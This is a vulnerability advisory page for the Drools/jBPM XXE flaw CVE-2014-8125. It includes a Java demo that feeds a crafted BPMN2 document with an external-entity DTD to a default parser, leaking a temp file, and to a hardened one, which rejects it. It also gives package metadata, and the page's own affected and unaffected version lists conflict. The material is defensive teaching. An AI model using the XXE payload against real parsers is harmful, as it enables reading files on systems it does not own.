Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS02cXg5LXJmOWctN2ptcs4AAdyR
Improper Input Validation in Drools and jBPM
XML external entity (XXE) vulnerability in Drools and jBPM before 6.2.0.Final: the BPMN2 process-definition parser resolves external entities, so a remote attacker who can get a crafted BPMN2 file parsed by the engine can read arbitrary files readable by the engine process, or possibly have other unspecified impact.
Permalink: https://github.com/advisories/GHSA-6qx9-rf9g-7jmr
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02cXg5LXJmOWctN2ptcs4AAdyR
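The following is an added, self-contained example (not code from the advisory, the Drools/jBPM project, or the linked commits) showing the vulnerability class: a constructed BPMN2 document whose internal DTD declares an external entity is fed to a plain JAXP DocumentBuilder, once with JDK defaults and once with the parser hardened per the OWASP XXE prevention guidance. The class name, the temporary "secret" file, and the hardening settings are assumptions for illustration; the remedy this advisory records is upgrading to 6.2.0.Final, and the linked commits may differ from the settings shown here.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXException;

public class Bpmn2XxeDemo {

    // Constructed stand-in for a file the attacker wants to read; written to a
    // temp path so the demo runs without touching anything real on the host.
    static Path writeSecret() throws Exception {
        Path p = Files.createTempFile("secret", ".properties");
        Files.write(p, "db.password=hunter2".getBytes(StandardCharsets.UTF_8));
        return p;
    }

    // Constructed malicious BPMN2 document. The internal DTD declares an external
    // entity whose SYSTEM identifier is the secret file. The entity is referenced
    // from element content (a reference from an attribute value is rejected as a
    // well-formedness error), so an entity-expanding parser copies the file's
    // contents into the process documentation.
    static String craftedBpmn2(Path secret) {
        return "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
             + "<!DOCTYPE definitions [\n"
             + "  <!ENTITY xxe SYSTEM \"" + secret.toUri() + "\">\n"
             + "]>\n"
             + "<definitions xmlns=\"http://www.omg.org/spec/BPMN/20100524/MODEL\" id=\"Definition\">\n"
             + "  <process id=\"evil\" name=\"evil\">\n"
             + "    <documentation>&xxe;</documentation>\n"
             + "    <startEvent id=\"start\"/>\n"
             + "  </process>\n"
             + "</definitions>\n";
    }

    // JAXP defaults on the JDK's built-in Xerces: DOCTYPE allowed, external
    // entities resolved. This is the behaviour an unhardened parser exhibits.
    static DocumentBuilder unhardened() throws ParserConfigurationException {
        return DocumentBuilderFactory.newInstance().newDocumentBuilder();
    }

    // Hardened factory (OWASP XXE prevention settings, assumed here): refuse any
    // DOCTYPE outright and, as defence in depth, disable external entities,
    // external DTD loading, XInclude and entity expansion. Some non-Xerces JAXP
    // implementations throw ParserConfigurationException for unknown features.
    static DocumentBuilder hardened() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    // Parse the document with the given builder and return the text of the
    // first <documentation> element (where the entity reference sits).
    static String documentation(DocumentBuilder b, String xml) throws Exception {
        Document d = b.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        return d.getElementsByTagName("documentation").item(0).getTextContent();
    }

    public static void main(String[] args) throws Exception {
        Path secret = writeSecret();
        try {
            String xml = craftedBpmn2(secret);
            // Default parser: the external entity is resolved and the secret
            // file's contents come back as the element text.
            System.out.println("unhardened: " + documentation(unhardened(), xml));
            // Hardened parser: the DOCTYPE is refused before any entity can be
            // resolved, so the file is never opened.
            try {
                documentation(hardened(), xml);
                System.out.println("hardened: parsed (unexpected)");
            } catch (SAXException e) {
                System.out.println("hardened: rejected: " + e.getMessage());
            }
        } finally {
            Files.deleteIfExists(secret);
        }
    }
}
```

Compile and run with `javac Bpmn2XxeDemo.java && java Bpmn2XxeDemo`. The practical check for a deployment is the same as the demo's second half: any code path that parses attacker-supplied BPMN2 (or any XML) must reject DOCTYPE declarations or disable external entity resolution; on the affected versions listed below, the only reliable fix is to upgrade to 6.2.0.Final.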
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: almost 2 years ago
Updated: over 1 year ago
Identifiers: GHSA-6qx9-rf9g-7jmr, CVE-2014-8125
References:
- https://nvd.nist.gov/vuln/detail/CVE-2014-8125
- https://github.com/droolsjbpm/drools/commit/c48464c3b246e6ef0d4cd0dbf67e83ccd532c6d3
- https://github.com/droolsjbpm/jbpm/commit/713e8073ecf45623cfc5c918c5cbf700203f46e5
- https://bugzilla.redhat.com/show_bug.cgi?id=1169553
- http://rhn.redhat.com/errata/RHSA-2015-0850.html
- http://rhn.redhat.com/errata/RHSA-2015-0851.html
- https://github.com/advisories/GHSA-6qx9-rf9g-7jmr
Blast Radius: 0.0
Affected Packages
maven:org.jbpm:jbpm-bpmn2
Dependent packages: 100
Dependent repositories: 501
Downloads:
Affected Version Ranges: <= 6.2.0.CR4
Fixed in: 6.2.0.Final
All affected versions:
All unaffected versions:
maven:org.drools:drools-core
Dependent packages: 419
Dependent repositories: 2,495
Downloads:
Affected Version Ranges: <= 6.2.0.CR4
Fixed in: 6.2.0.Final
All affected versions:
All unaffected versions: 5.0.1, 5.1.0, 5.1.1